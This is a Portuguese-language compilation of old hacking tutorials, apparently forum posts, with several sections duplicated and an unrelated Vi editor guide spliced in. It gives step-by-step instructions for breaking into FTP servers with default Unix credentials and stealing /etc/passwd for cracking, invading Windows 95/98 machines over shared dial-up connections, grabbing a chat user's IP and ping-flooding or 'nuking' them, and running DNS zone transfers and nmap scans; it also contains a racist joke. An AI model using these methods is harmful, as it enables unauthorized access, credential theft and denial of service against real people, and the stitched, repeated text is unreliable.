OBS: se naum der serto eh porke vc ta fazendu alguma merda, noob eh foda, esses metodos saum muitu antigos, mas da pra explorar alguns konhecimentos em outras partes da web, lembre se ke kaundu vc tenta pakotar alguem usandu sua propria makina e konecxaum, vc se auti se flooda, lag a si msm, pois vc usa sua banda para derrubar o outru, se vc tiver uma shell remota poderah ganhar tempo e facilidades...
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Invasão por FTP
Para Hackear um Servidor FTP, Primeiro você deve saber o endereço do Host ou seu
IP, para isto use o IPSCAN ou outro programa qualquer de IP.
Lista de Alguns FTP's:
ftp.mandic.com.br
ftp.bestway.com.br
ftp.internetclub.com.br
ftp.netscape.com
ftp.angelfire.com
Existem vários Programas de FTP'S, no Windows vem um programa de FTP. Vá ao
Prompt e digite FTP, ao aparece o prompt ftp>, digite OPEN, ira abrir um outro
Prompt (to), digite o nome do host ou seu IP, tipo (to) ftp.mandic.com.br.
Ao conectar ele pedirá a senha e o Password, tente usar os passwords UNIX, aí
vai os passwords do UNIX, se não der você deve tentar entrar INVISIVEL:
Login:Password:
root:root
root:system
sys:sys
sys:system
daemon:daemon
uucp:uucp
tty:tty
test:test
unix:unix
unix:test
bin:bin
adm:adm
adm:admin
admin:adm
admin:admin
sysman:sysman
sysman:sys
sysman:system
sysadmin:sysadmin
sysadmin:sys
sysadmin:system
sysadmin:admin
sys:adminadm
who:who
learnl:earn
uuhost:uuhost
guest:guest
host:host
nuucp:nuucp
rje:rje
games:games
games:player
sysop:sysop
root:sysop
demo:demo
Para entrar Invisível:
No login pressione ENTER, no password pressione ENTER novamente...
Ira aparecer o prompt ftp> ai é só digitar:
quote user ftp , pressione ENTER e digite:
quote cwd ~root
Pressione ENTER novamente e digite:
quote pass ftp
Pronto, você esta Hackeando invisível...
Mas tem um porem..., se quando você entrar aparecer a mensagem: user restriction
aplly, você não esta Hackeando, pois esta aplicada a proteção... para isto tente
com outro USER tipo:
quote cwd ~sys e os outros da lista UNIX (acima)
ATENÇÃO!!!!
Não tente Hackear usando o user normal de FTP'S, que é login : anonymous e
password: seu E-Mail, pois vai ser aplicado a proteção.... Ao entrar você vai
estar no diretório do login, tipo \home\root\
Daí você entra no diretório /etc (cd etc) e pegue o arquivo PASSWD (get passwd),
ele contém as senhas doas usuários, estão todas criptografadas, mas existe
programas com o Jack que conseguem descriptografar através do método de
comparação, o Jack pega uma Worlist (arquivo palavras mais usadas como senha),
criptografa ela com as instruções do passwd e compara, os resultados são
gravados em um arquivo (acho, ele não roda no meu PC!).
O arquivo de senhas podem estar em vários diretórios, dependendo do tipo de
UNIX, olhe a lista abaixo:
UNIX:Diretório:
AIX 3:/etc/security/passwd
/tcb/auth/files//
A:/UX 3.Os:/tcb/files/auth/?
BSD4.3-Reno:/etc/master.passwd
ConvexOS 10:/etc/shadpw
Convex0S 11:/etc/shadow
DG:/UX/etc/tcb/aa/user
EP:/IX/etc/shadow
HP-UX:/.secure/etc/passwd
IRIX 5:/etc/shadow
Linux 1.1:/etc/shadow
OSF:/1/etc/passwd[.dir|.pag]
SCO Unix #.2.x:/tcb/auth/files/
SunOS 4.1+c2:/etc/security/passwd.adjunct
SunOS 5.0:/etc/shadow
System V 4.0:/etc/shadow
System V 4.2:/etc/security/database
Ultrix 4:/etc/auth[.dir|.pag]
UNICOS:/etc/udb
Bom... se você não sabe os comandos, ai vai a dica... Se você estiver no MS-DOS,
digite ? e tecle ENTER em qualquer lugar, pois irá aparecer os comandos... e ai
é só Hackear.
Não fique mais que 5 Min em um servidor, pois ele caçara seu IP, e seu login, e
pode dá cadeia.
Não me responsabilizo por atos cometidos nos servidores... o problema é de quem
Hackeia, e não meu, tome muito cuidado, e NUNCA, mas NUNCA apague NADA...
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Invasão por Dial-Up
esse tipo de konecxaum esta em dekadencia, pois a konecxaum em rede eh muitu mais segura, mas ainda existe servidores remotos em winx, e ate msm linux usando Dual-Up, macete e saber identifikalos, vc deve konhecer sua vitima para poder derrubala... para um hacker: "KONHECIMENTO NUNKA OKUPA EXPAÇO NO DISKO RIGIDO" :
Invadindo usários de Windows 95/98 que utilizam a rede Dial Up com uma conexão PPP Devido a um enorme número de Bugs, e uma capacidade de proteção que permite que qualquer pessoa invada um micro que utilize a rede Dial Up com uma conexão PPP, o Windows é um dos maiores motivos de piadas entre os portugueses, negros e o Rubinho Barriquelo. Mesmo que vc não esteja utilizando o compartilhamento de arquivos, qualquer pessoa pode invadir seu computador se vc estiver utilizando esse tipo de conexão. Para esta "receita de bolo" funcionar, vc tem que estar usando a rede Dial Up e uma conexão PPP. Antes de tudo verifique se vc possui os drivers de clientes da microsof. Caso não estejam instalados, instale-os através do painel de controle no ícone redes. Verifique tb, se o compartilhamento de arquivos e impressoras está instalado Configurar essas opçõesé simples. Vá ao Painel de Controle e abra Rede. Verifiqueas propriedades do protocolo TCP/IP. Alí você encontraráa opção para ativar a resolução WINS. No casode você não conhecer nenhum servidor WINS, utilize 204.118.34.6como primário e 204.118.34.11 como secundário. Esses servidoressão dos USA, e gratuítos. Caso queira outros endereços,utilize um dos mecanismos de busca na Internet. Para configurar o LMHOSTS,você precisa criar um arquivo texto simples, utilizando-se atámesmo o Bloco de Notas do Windows. O arquivo criado deve chamar-se LMHOSTS.É nesse arquivo que ficarão os endereços de IP e osnomes dos computadores que você terá acesso. Para localizarum determinado computador, você digita o seu número de IPe a seguir seu NetBios, na mesma linha, separados por um espaço.Se você executar o programa NBSTSTAT, seguido da opção-N, você obterá essa lista, com o nome e o IP de seu computadorsempre sendo o primeiro da lista, seguido das outras máquinas disponíveis,tudo numa janela DOS. Através do Explorer você poderá ver os computadores disponíveis na rede,dos quais você aindapoderá utilizar os discos mapeando-os, o que os tornará unidades de seu computador. Invadindo pela porta 666 Para invadir é facil vc deve ter um programa de conexão via telenet (telnet q ja vem com o WIN95/98 ou similar) e também um programa chamado aabout. O q deve ser feito, este programa aabout deve ser acionado por ambas as parte (invasor e invadido) e o q ele faz?? Bem, ele abre uma porta de conexão entre os dois CPUs via a porta 666. Vc deve ligar o telenet colocar no rost o numero do IP da pessoa e em port deve-se colocar 666. Bem vc ja esta conectado, dai no login vc deve digita cg! (com o "!") e dar um dir vendo tudo o q tem no CPU da outra pessoa. Invadindo pelo IP da vitíma A invasão pôr IP pode ser feita de varias maneiras, aqui vai um jeito fácil de invadir sem ter q ficar fazendo mil coisas. Aqui vc aprenderá um meio de invadir pôr IP que só é garantido se vc e a pessoa a ser invadida estiverem o com o compartilhamento de dados ligado, e estiver entrando pela rede dial-up com a rede microsoft instalada. Se vc não esta com a rede microsoft instalada e não sabe invadir, ai vai: Primeiro vá em meu computador, painel de controle, rede. Quando vc entrar na rede vai abrir uma caixa de comandos, veja lá se a rede microsoft esta instalada, se estiver instalada vá em logon principal da rede e escolha cliente para a rede microsoft , caso não esteja instalada, va em adicionar, na caixa va em cliente, depois em microsoft e escolha cliente p/ rede microsoft. Caso vc não ache esses nomes va em com disco precure lá. Depois de instalado volte para o meu computador, vá acesso a rede dial-up e clique com o botão direito na conexão q vc faz. La vá em propiedades, tipo do servidor, configuração TCP/IP, e especificar o IP. Lá vc poe o Ip do cara q vc vai invadir. Dai é só reconectar, ir em explorando do windows, ambiente de rede, e toda a rede. Assim q vc clicar em toda a rede o CPU do cara aparecera la. Lembresse q isso só dará certo se vc conectar via dial-up pelo Win95, ppp. Caso contrario não funcionara, e q também só dá certo se o compartilhamento de dados e impressão estiver ligado. É lógico q há maneiras de burlar isso, mas é perciso manja de alguma lingugem. (vc pode fazer uma linha de comando no windows q vai até o compartilhamento e liga e passar esse programa para o cara dizendo q é outra coisa, o unico prblema é q ele tem q reiniciar o CPU, mas ha modos para mudar isso também).
Invasão por IP
Descobrindo o IP ou Host de uma provedora:
Encontre no seu micro, o atalho ou aviso do MS-DOS/prompt. Clique nele, deverá surgir uma tela preta com a seguinte aparência:
c:\WINDOWS>
c:\Documents and Settings\user>
nele digite:
ping www.provedoradocaraquevcquer.com.br
Ficando assim:
c:\WINDOWS> PING www.provedoradocaraquevcquer.com.br
Será retornado o Host da provedora bbs e etc... da seus pulos uhauhauhauhauhuha
Eu tenho o ip e não sei a provedora
Digite no prompt/MS_DOS
tracert ipdocara
Ficando Assim:
c:WINDOWS>tracert ipdocara
Será retornado o nome da provedora do cara, é so prestar atenção.
Pegando Ip em chat:
Feche todos os seus aplicativos de rede, mirc, msn, putty, utorrent, kazza ..., que você estiver usando. Feche todos navegadores que não sejam da sala aonde o cara se encontra é lógico! Concentre-se só na sala do chat na qual se encontra o cara que vc quer pegar o ip. Peça as pessoas que estão conversando com vc pararem de te mandarem mensagens, quando isto aontecer mande algumas mensagens em sequência para a vítima, alterne para o seu MS-DOS[ALT+TAB] , na hora e digite arp -a Ficando assim: c:WINDOWS> arp -a Neste momento serão retornados, vários ips, (4 à 6 em média ). O primeiro é o ip da sala aonde vc se encontra. Entretanto, na ´´Maioria da Vezes`` o segundo ip é o do gafanhoto que vc quer mandar para os sapos ! se vc não tem certeza e deseja confirmar isto, guarde o ip e compare com as informações que vc tem sobre a vítima (provedora po exemplo). Se você não sabe nada dela, paciênia, pegue todos os ips e nuke um á um, ou faça um ping flood que será explicado abaixo, ou repita o procedimento acima várias vezes e guarde os ips que estão repetindo com mais frequência. E tome as medidas que desejar. de dns nos ips para xekar ke eles resolvem...
Tente o seguinte comando no prompt do MS-DOS
ping -f-11000 -t ipdocara ou ping -t -11000 -f ipdocara ou ping -t -11000 -f ipdocara
Repita o procedimento ate ele cair. lembre-se de que, quanto mais pessoas fazendo junto com vc, mais rápido será o tombo
vc pode fazer issu aotomatikamente.. criadu um arkivo .BAT kom os komandos ips programandos, ae naum preciza vc fikar dando ping manualmente...
Atraves de um NUKER
Pegue um scan qualquer passe nas portas do micro do mané. Observe as que estão sem proteçãp e nuke ! a maioria dos nukes vem designado as portas 137, 138, 139. Então mude e ´´meta os ferro`` nas portas sem proteção.
Usando um Scan
Passe o programa portscan nas portas do micro da vítima constantemente, ping o micro do cara como na lição 4. o ´´inimigo`` no mínimo vai ficar uma lerdeza hehehe ... Se vc quiser arriscarr, nuke ao mesmo tempo. Aviso: quem pode peder a conexão é vc !
OBS: se naum der serto eh porke vc ta fazendu alguma merda, noob eh foda, esses metodos saum muitu antigos, mas da pra explorar alguns konhecimentos em outras partes da web, lembre se ke kaundu vc tenta pakotar alguem usandu sua propria makina e konecxaum, vc se auti se flooda, lag a si msm, pois vc usa sua banda para derrubar o outru, se vc tiver uma shell remota poderah ganhar tempo e facilidades...
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Invasão por FTP
Para Hackear um Servidor FTP, Primeiro você deve saber o endereço do Host ou seu
IP, para isto use o IPSCAN ou outro programa qualquer de IP.
Lista de Alguns FTP's:
ftp.mandic.com.br
ftp.bestway.com.br
ftp.internetclub.com.br
ftp.netscape.com
ftp.angelfire.com
Existem vários Programas de FTP'S, no Windows vem um programa de FTP. Vá ao
Prompt e digite FTP, ao aparece o prompt ftp>, digite OPEN, ira abrir um outro
Prompt (to), digite o nome do host ou seu IP, tipo (to) ftp.mandic.com.br.
Ao conectar ele pedirá a senha e o Password, tente usar os passwords UNIX, aí
vai os passwords do UNIX, se não der você deve tentar entrar INVISIVEL:
Login:Password:
root:root
root:system
sys:sys
sys:system
daemon:daemon
uucp:uucp
tty:tty
test:test
unix:unix
unix:test
bin:bin
adm:adm
adm:admin
admin:adm
admin:admin
sysman:sysman
sysman:sys
sysman:system
sysadmin:sysadmin
sysadmin:sys
sysadmin:system
sysadmin:admin
sys:adminadm
who:who
learnl:earn
uuhost:uuhost
guest:guest
host:host
nuucp:nuucp
rje:rje
games:games
games:player
sysop:sysop
root:sysop
demo:demo
Para entrar Invisível:
No login pressione ENTER, no password pressione ENTER novamente...
Ira aparecer o prompt ftp> ai é só digitar:
quote user ftp , pressione ENTER e digite:
quote cwd ~root
Pressione ENTER novamente e digite:
quote pass ftp
Pronto, você esta Hackeando invisível...
Mas tem um porem..., se quando você entrar aparecer a mensagem: user restriction
aplly, você não esta Hackeando, pois esta aplicada a proteção... para isto tente
com outro USER tipo:
quote cwd ~sys e os outros da lista UNIX (acima)
ATENÇÃO!!!!
Não tente Hackear usando o user normal de FTP'S, que é login : anonymous e
password: seu E-Mail, pois vai ser aplicado a proteção.... Ao entrar você vai
estar no diretório do login, tipo \home\root\
Daí você entra no diretório /etc (cd etc) e pegue o arquivo PASSWD (get passwd),
ele contém as senhas doas usuários, estão todas criptografadas, mas existe
programas com o Jack que conseguem descriptografar através do método de
comparação, o Jack pega uma Worlist (arquivo palavras mais usadas como senha),
criptografa ela com as instruções do passwd e compara, os resultados são
gravados em um arquivo (acho, ele não roda no meu PC!).
O arquivo de senhas podem estar em vários diretórios, dependendo do tipo de
UNIX, olhe a lista abaixo:
UNIX:Diretório:
AIX 3:/etc/security/passwd
/tcb/auth/files//
A:/UX 3.Os:/tcb/files/auth/?
BSD4.3-Reno:/etc/master.passwd
ConvexOS 10:/etc/shadpw
Convex0S 11:/etc/shadow
DG:/UX/etc/tcb/aa/user
EP:/IX/etc/shadow
HP-UX:/.secure/etc/passwd
IRIX 5:/etc/shadow
Linux 1.1:/etc/shadow
OSF:/1/etc/passwd[.dir|.pag]
SCO Unix #.2.x:/tcb/auth/files/
SunOS 4.1+c2:/etc/security/passwd.adjunct
SunOS 5.0:/etc/shadow
System V 4.0:/etc/shadow
System V 4.2:/etc/security/database
Ultrix 4:/etc/auth[.dir|.pag]
UNICOS:/etc/udb
Bom... se você não sabe os comandos, ai vai a dica... Se você estiver no MS-DOS,
digite ? e tecle ENTER em qualquer lugar, pois irá aparecer os comandos... e ai
é só Hackear.
Não fique mais que 5 Min em um servidor, pois ele caçara seu IP, e seu login, e
pode dá cadeia.
Não me responsabilizo por atos cometidos nos servidores... o problema é de quem
Hackeia, e não meu, tome muito cuidado, e NUNCA, mas NUNCA apague NADA...
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Invasão por Dial-Up
esse tipo de konecxaum esta em dekadencia, pois a konecxaum em rede eh muitu mais segura, mas ainda existe servidores remotos em winx, e ate msm linux usando Dual-Up, macete e saber identifikalos, vc deve konhecer sua vitima para poder derrubala... para um hacker: "KONHECIMENTO NUNKA OKUPA EXPAÇO NO DISKO RIGIDO" :
Invadindo usários de Windows 95/98 que utilizam a rede Dial Up com uma conexão PPP Devido a um enorme número de Bugs, e uma capacidade de proteção que permite que qualquer pessoa invada um micro que utilize a rede Dial Up com uma conexão PPP, o Windows é um dos maiores motivos de piadas entre os portugueses, negros e o Rubinho Barriquelo. Mesmo que vc não esteja utilizando o compartilhamento de arquivos, qualquer pessoa pode invadir seu computador se vc estiver utilizando esse tipo de conexão. Para esta "receita de bolo" funcionar, vc tem que estar usando a rede Dial Up e uma conexão PPP. Antes de tudo verifique se vc possui os drivers de clientes da microsof. Caso não estejam instalados, instale-os através do painel de controle no ícone redes. Verifique tb, se o compartilhamento de arquivos e impressoras está instalado Configurar essas opçõesé simples. Vá ao Painel de Controle e abra Rede. Verifiqueas propriedades do protocolo TCP/IP. Alí você encontraráa opção para ativar a resolução WINS. No casode você não conhecer nenhum servidor WINS, utilize 204.118.34.6como primário e 204.118.34.11 como secundário. Esses servidoressão dos USA, e gratuítos. Caso queira outros endereços,utilize um dos mecanismos de busca na Internet. Para configurar o LMHOSTS,você precisa criar um arquivo texto simples, utilizando-se atámesmo o Bloco de Notas do Windows. O arquivo criado deve chamar-se LMHOSTS.É nesse arquivo que ficarão os endereços de IP e osnomes dos computadores que você terá acesso. Para localizarum determinado computador, você digita o seu número de IPe a seguir seu NetBios, na mesma linha, separados por um espaço.Se você executar o programa NBSTSTAT, seguido da opção-N, você obterá essa lista, com o nome e o IP de seu computadorsempre sendo o primeiro da lista, seguido das outras máquinas disponíveis,tudo numa janela DOS. Através do Explorer você poderá ver os computadores disponíveis na rede,dos quais você aindapoderá utilizar os discos mapeando-os, o que os tornará unidades de seu computador. Invadindo pela porta 666 Para invadir é facil vc deve ter um programa de conexão via telenet (telnet q ja vem com o WIN95/98 ou similar) e também um programa chamado aabout. O q deve ser feito, este programa aabout deve ser acionado por ambas as parte (invasor e invadido) e o q ele faz?? Bem, ele abre uma porta de conexão entre os dois CPUs via a porta 666. Vc deve ligar o telenet colocar no rost o numero do IP da pessoa e em port deve-se colocar 666. Bem vc ja esta conectado, dai no login vc deve digita cg! (com o "!") e dar um dir vendo tudo o q tem no CPU da outra pessoa. Invadindo pelo IP da vitíma A invasão pôr IP pode ser feita de varias maneiras, aqui vai um jeito fácil de invadir sem ter q ficar fazendo mil coisas. Aqui vc aprenderá um meio de invadir pôr IP que só é garantido se vc e a pessoa a ser invadida estiverem o com o compartilhamento de dados ligado, e estiver entrando pela rede dial-up com a rede microsoft instalada. Se vc não esta com a rede microsoft instalada e não sabe invadir, ai vai: Primeiro vá em meu computador, painel de controle, rede. Quando vc entrar na rede vai abrir uma caixa de comandos, veja lá se a rede microsoft esta instalada, se estiver instalada vá em logon principal da rede e escolha cliente para a rede microsoft , caso não esteja instalada, va em adicionar, na caixa va em cliente, depois em microsoft e escolha cliente p/ rede microsoft. Caso vc não ache esses nomes va em com disco precure lá. Depois de instalado volte para o meu computador, vá acesso a rede dial-up e clique com o botão direito na conexão q vc faz. La vá em propiedades, tipo do servidor, configuração TCP/IP, e especificar o IP. Lá vc poe o Ip do cara q vc vai invadir. Dai é só reconectar, ir em explorando do windows, ambiente de rede, e toda a rede. Assim q vc clicar em toda a rede o CPU do cara aparecera la. Lembresse q isso só dará certo se vc conectar via dial-up pelo Win95, ppp. Caso contrario não funcionara, e q também só dá certo se o compartilhamento de dados e impressão estiver ligado. É lógico q há maneiras de burlar isso, mas é perciso manja de alguma lingugem. (vc pode fazer uma linha de comando no windows q vai até o compartilhamento e liga e passar esse programa para o cara dizendo q é outra coisa, o unico prblema é q ele tem q reiniciar o CPU, mas ha modos para mudar isso também).
TuTo Utilizando o editor Vi By PitBull
O que fazer qndo se precisa editar algo e ao digitar pico arquivo.* , vc descobre que nao esta instalado na maquina o pico, e ai o que fazer? simples, utilize o editor vi !
Introdução
O sistema operacional GNU/Linux, assim como qualquer outro UNIX, possui todos os arquivos de configuração em formato texto, diferentemente de outros sistemas operacionais que armazenam suas configurações em arquivos binários. Isso possui várias vantagens, entre elas a de ser fácil de modificar para corrigir erros eventuais e são de difícil corrompimento pois são simplesmente texto.
Ao se deparar com a necessidade de alterar algum desses arquivos, você pode utilizar editores bem completos como o jed, XEmacs, ou um mais simples como o gedit e até o joe, mas nenhum desses editores se compara ao Vi em termos de denominador comum. O Vi existe em qualquer distribuição de Linux e está disponível em qualquer emergência (sabe quando o sistema não inicializa por algum motivo e você tem que editar o lilo.conf ou o modules.conf?).
Levando em consideração esse fato, torna-se indispensável conhecer o Vi, pelo menos seu uso básico, apesar deste editor possuir variantes muito mais completas que indicaremos mais para frente.
O Vi foi originalmente criado pelo residente da Sun, Bill Joy, a partir do ed, quando ele ainda estudava em Stanford.
Usando o Vi
Vou começar mostrando o básico do Vi e mais adiante, os recursos "avançados". O Vi simples serve apenas para editar, enquanto que suas variantes servem até para programar, compilar e debugar programas.
Anos e anos de experiência me ensinaram que o melhor meio de se aprender a usar algum aplicativo é praticando, por isso, primeiramente listaremos os comandos mais importantes e logo em seguida partiremos para um exemplo onde se utilizam esse comandos.
Existem dois modos no Vi:
* edição
* comando
Modo de Edição
No modo de edição, você pode digitar a vontade como se fosse um editor de textos comum. Esse modo é iniciado no editor - a partir do shell digitando-se vi entra-se no editor - através de um dos seguintes comandos:
Código:
* i : insere texto a partir do cursor atual
* a : insere texto depois do cursor atual
* I : insere texto no início da linha
* A : insere texto no final da linha
* s : substitui texto no cursor atual
* S : substitui texto depois do cursor atual
* o : abre uma linha abaixo do cursor atual
Modo de Comando
No modo de comando, você pode executar comandos . O modo de comando começa quando se aperta a tecla ESC. Alguns desses comandos são: substituição, inserção e procura de texto, gravação e abertura de arquivos entre outros, além de recorte, cópia e colagem de texto.
Os comandos mais usados são:
Código:
* /Expressão : Procura Expressão (que pode ser qualquer palavra) no texto
* n : Procura próxima ocorrência de Expressão no texto
* N : Procura ocorrência anterior de Expressão no texto
* yy : Copia linha atual do texto para memória
* p : Cola conteúdo da memória no texto
* dd : Apaga linha atual (e coloca na memória)
* n comando : Um número n (1, 2, ...) seguido de qualquer comando executa o comando n vezes
* u : Desfaz última ação executada
* . : Refaz última ação executada
* :n : Pula para linha de número n
* :w : Salva o arquivo atual
* :wq : Salva o arquivo atual e sai do Vi
* : Salva o arquivo atual e sai do Vi (equivalente) a :wq
* :q : Sai do Vi
* :q! : Sai do Vi , independe de salvar o conteúdo atual
* :w arquivo : Salva o arquivo atual com o nome arquivo
Bom é isso, espero ter ajudado, abraços !
By PitBull
_________________
Introdução
O sistema operacional GNU/Linux, assim como qualquer outro UNIX, possui todos os arquivos de configuração em formato texto, diferentemente de outros sistemas operacionais que armazenam suas configurações em arquivos binários. Isso possui várias vantagens, entre elas a de ser fácil de modificar para corrigir erros eventuais e são de difícil corrompimento pois são simplesmente texto.
Ao se deparar com a necessidade de alterar algum desses arquivos, você pode utilizar editores bem completos como o jed, XEmacs, ou um mais simples como o gedit e até o joe, mas nenhum desses editores se compara ao Vi em termos de denominador comum. O Vi existe em qualquer distribuição de Linux e está disponível em qualquer emergência (sabe quando o sistema não inicializa por algum motivo e você tem que editar o lilo.conf ou o modules.conf?).
Levando em consideração esse fato, torna-se indispensável conhecer o Vi, pelo menos seu uso básico, apesar deste editor possuir variantes muito mais completas que indicaremos mais para frente.
O Vi foi originalmente criado pelo residente da Sun, Bill Joy, a partir do ed, quando ele ainda estudava em Stanford.
Usando o Vi
Vou começar mostrando o básico do Vi e mais adiante, os recursos "avançados". O Vi simples serve apenas para editar, enquanto que suas variantes servem até para programar, compilar e debugar programas.
Anos e anos de experiência me ensinaram que o melhor meio de se aprender a usar algum aplicativo é praticando, por isso, primeiramente listaremos os comandos mais importantes e logo em seguida partiremos para um exemplo onde se utilizam esse comandos.
Existem dois modos no Vi:
* edição
* comando
Modo de Edição
No modo de edição, você pode digitar a vontade como se fosse um editor de textos comum. Esse modo é iniciado no editor - a partir do shell digitando-se vi entra-se no editor - através de um dos seguintes comandos:
Código:
* i : insere texto a partir do cursor atual
* a : insere texto depois do cursor atual
* I : insere texto no início da linha
* A : insere texto no final da linha
* s : substitui texto no cursor atual
* S : substitui texto depois do cursor atual
* o : abre uma linha abaixo do cursor atual
Modo de Comando
No modo de comando, você pode executar comandos . O modo de comando começa quando se aperta a tecla ESC. Alguns desses comandos são: substituição, inserção e procura de texto, gravação e abertura de arquivos entre outros, além de recorte, cópia e colagem de texto.
Os comandos mais usados são:
Código:
* /Expressão : Procura Expressão (que pode ser qualquer palavra) no texto
* n : Procura próxima ocorrência de Expressão no texto
* N : Procura ocorrência anterior de Expressão no texto
* yy : Copia linha atual do texto para memória
* p : Cola conteúdo da memória no texto
* dd : Apaga linha atual (e coloca na memória)
* n comando : Um número n (1, 2, ...) seguido de qualquer comando executa o comando n vezes
* u : Desfaz última ação executada
* . : Refaz última ação executada
* :n : Pula para linha de número n
* :w : Salva o arquivo atual
* :wq : Salva o arquivo atual e sai do Vi
* : Salva o arquivo atual e sai do Vi (equivalente) a :wq
* :q : Sai do Vi
* :q! : Sai do Vi , independe de salvar o conteúdo atual
* :w arquivo : Salva o arquivo atual com o nome arquivo
Bom é isso, espero ter ajudado, abraços !
By PitBull
_________________
[TUTO] Introdução Tecnicas de Invasão
Estudo das Técnicas de Invasão
1. Obtendo informações iniciais do alvo com navegadores Web
Visita ao site da empresa em busca de:
- Endereços
- Empresas ou entidades relacionadas
- Notas de fusões e aquisições
- Números de telefone
- Nomes e endereços de correio eletrônico para contato.
- Normas de privacidade ou segurança que indicam o tipo de mecanismo de segurança em uso
- Links para outros servidores Web relacionados
Examinar código-fonte de páginas em busca de comentários. Vasculhar listas de discussão em busca de pedidos de ajuda que revelem senhas padrão, configurações de rede etc.
Examinar bancos de dados sofisticados como Miners ou Altavista. Nesses bancos de dados é possível conhecer outros sites associados ao site principal
Examinar banco de dados públicos como sites da Receita, CVM, SEC (americana), sites de notícias econômicas, etc.
2. Obtendo informações do site com whois
Whois Exibe informações sobre:
- Organizacionais
- Domínio
- Rede
- Ponto de contato
Servidores Whois
Europa http://whois.ripe.net
Ásia http://whois.apnic.net
Militar http://whois.nic.mil (EUA)
Governo http://whois.nic.gov (EUA)
Brasil http://whois.registro.br
Cliente Whois, distribuído em qualquer versão de UNIX/Linux, é capaz de
verificar domínios .com,.gov, .org e .edu.
OU diretamente no site http://www.networksolutions.com ou http://www.arin.net
As informações coletadas em pesquisas whois podem trazer informações
relevantes como
- Quem registrou o domínio
- O nome do domínio
- O contato administrativo
- Quando o registro foi atualizado e criado
- Os servidores de nomes
O nome do responsável técnico traz seu telefone, fax, email e endreço, os quais podem ser usados para ataques de engenharia social. Os telefones podem ser usados para discagens de guerra.
Para pesquisas de sites brasileiros, a consulta é a seguinte:
$ whois domínio.com.br@whois.registro.br
Para obter informações sobre o domínio.
Depois executa-se whois sobre o endereço IP do primeiro DNS e se obtém a faixa de endereços IPs atribuídos ao domínio.
$whois 10.10.10.1@whois.registro.br
3. Interrogação de DNS com nslookup e host
O DNS (Domain Name Server) é um serviço para conversão de nomes de domínio, tais como www.dominiodeumaempresaqualquer.com.br e seu endereço IP, exemplo 10.10.10.1, e vice-versa.
O DNS na realidade são sempre, no mínimo, dois computadores (primário mestre, e primário escravo, muitas vezes chamado de primário e secundário). Esses computadores contêm um pequeno banco de dados com informações OFICIAIS sobre seu próprio domínio. A informação se torna oficial porque o endereço IP desses servidores têm de ser registrados na FAPESP, Internic ou outro órgão de registro.
Se alguém deseja informações de conversão (resolução) de nomes para um determinado servidor de um domínio, quer seja ele um servidor web, correio, ftp ou outro, consulta o DNS daquele domínio.
O DNS também armazena na memória RAM do computador as informações relativas a domínios consultados na rede (cache), informações essas obtidas dos DNS oficiais dos domínios consultados.
O servidor DNS secundário contém uma réplica do banco de dados do servidor primário. Quando se altera o banco de dados do primário, há uma transferência dos dados do servidor primário para o servidor secundário. Essa transferência é chamada de transferência de zona.
O problema das transferências de zona é que muitas empresas colocam ali dados sobre suas redes internas. O invasor pode usar o comando nslookup, default em aplicações U*X (Unix/Linux) para executar essas transferências de zona para sua própria máquina.
A solução para esse problema está em definir DNSs separados para a rede interna e a rede externa. Também deve-se barrar qualquer consulta na porta 53 via TCP que venha de fora da rede no firewall, já que as solicitações de transferências de zona são feitas com protocolo TCP e as consultas de nomes, inevitáveis para quem quer se conectar à rede da empresa, são feitas com protocolo UDP.
Usando o comando whois estudado acima, obtém-se o endereço do DNS de um domínio alvo.
Usa-se o comando nslookup da seguinte forma:
nslookup
Este comando abre um prompt interativo indicado pelo sinal ">". Assim, digita-se:
>server 10.10.10.1
>set type=any
> ls -d dominioalvo.com.br.
Observe que o endereço fictício 10.10.10.1 é o endereço do DNS primário do domínio alvo. O comando server serve para definir este servidor como o default, ou seja, aquele de quem vamos solicitar a transferência de zona. O comando set type=any permite obter todos os registros DNS disponíveis. O
comando ls -d domínioalvo.com.br. lista todos os os registros do domínio.
Observe que depois de dominioalvo.com.br há um ponto final.
Outros comandos que realizam o mesmo trabalho são os comandos:
host -l dominioalvo.com.br
ou
host -l -v -t any dominioalvo.com.br
Para descobrir servidores de correio é só digitar:
host dominioalvo.com.br
A importância deste último comando está em que o servidor de correio
normalmente está na mesma rede do firewall da rede interna.
4. Traçando a rota da rede com traceroute/tracert
O comando traceroute (ftp://ftp.ee.lbl.gov/traceroute.tar.Z), tracert no Windows 9X/NT/2K, permite a determinação da rota a partir de uma máquina até seu destino.
A sintaxe padrão é:
traceroute <endereço IP ou nome do destino>
No caso do Windows 9x/NT/2k, esse comando é
tracert <endereço IP ou nome do destino>
O resultado é algo como:
1 a47002.provedor.com.br (10.10.10.2) 160.200 ms 157.133 ms 149.642 ms
2 a01001.sp2.provedor.com.br (10.11.11.1) 149.872 ms 159.742 ms 149.769 ms
3 b13041.provedor.com.br (10.11.12.41) 159.860 ms b13001.provedor.com.br (10.11.12.1) 169.645 ms b13041.provedor.com.br (10.10.10.41) 149.791 ms
4 provedor-A3-3-31-dist04.spo.backbone.net.br (10.10.10.9) 489.654 ms 489.619 ms 480.043 ms
5 provedor-A3-3-31-dist04.spo.backbone.net.br (10.10.10.9) 479.637 ms bb-F1-1-0-acc06.spo.backbone.net.br (10.10.10.73) 499.758 ms 488.718 ms
6 hm31.site-alvo.com.br (10.10.10.101) 489.825 ms 488.736 ms bb-F1-1-0-acc06.spo.backbone.net.br (10.10.10.73) 489.880 ms
O traceroute do Unix/Linux trabalha com pacotes UDP, o tracert trabalha com pacotes ICMP. Para usar pacotes ICMP com traceroute, pode ser usada a opção -I. A porta de conexão do traceroute pode ser escolhida -pela opção -p.
Com este comando é possível tirar conclusões sobre a topologia da rede alvo.
5. Varredura de rede com nmap
Um dos programas mais conhecidos atualmente para levantamento de topologia de rede é o nmap (http://www.insecure.org). Ele permite vasculhar uma rede e identificar todas as máquinas ativas, retornando seus endereços IP. Ele também permite descobrir que portas estão abertas em cada máquina e identificar o sistema operacional. O sistema operacional pode ser identificado devido à natureza aberta das especificações da pilha TCP/IP. Cada implementação da pilha carrega peculiaridades que permitem identificá-la.
Um exemplo de comando nmap para vasculhar a rede é:
# nmap -O -v -v 10.0.0.1-254
Neste caso o nmap vai varrer todas as máquinas com endereços de 10.0.0.1 a 10.0.0.254, identificar que portas estão abertas, seu estado (ouvindo, por exemplo) e apresentar o sistema operacional provável.
